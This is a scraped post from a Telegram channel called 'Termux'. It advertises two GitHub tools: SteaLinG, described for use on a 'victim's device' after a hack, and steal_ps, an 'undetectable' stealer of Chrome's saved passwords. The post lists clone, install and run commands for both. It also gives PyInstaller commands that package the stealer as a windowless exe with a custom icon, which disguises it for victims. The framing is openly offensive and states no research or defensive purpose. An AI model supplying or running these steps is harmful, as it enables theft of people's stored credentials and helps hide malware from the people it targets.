Termux
2.2K subscribers
670 photos
83 videos
407 files
739 links
Termux-Collection
Download Telegram
¶¶ SteaLinG
The SteaLinG is an open-source penetration testing framework designed for social engineering After the hack, you can upload it to the victim's device and run it

git clone https://github.com/De3vil/SteaLinG.git
cd SteaLinG
pip install -r requirements.txt
python SteaLinG.py

¶¶ steal_ps

steal_ps Stealing chrome's saved passwords "undetectable"

git clone https://github.com/De3vil/steal_ps.git
2. cd steal_ps
3. pip install -r requirements.txt
4. python3 Run_chr.py
``
compiling
compile output python file to exe
pyinstaller --onefile --noconsole file_chrom.py
yo can set ico
pyinstaller --onefile --noconsole --icon="youricon.ico" file_chrom.py
#chrome #stealpassword #python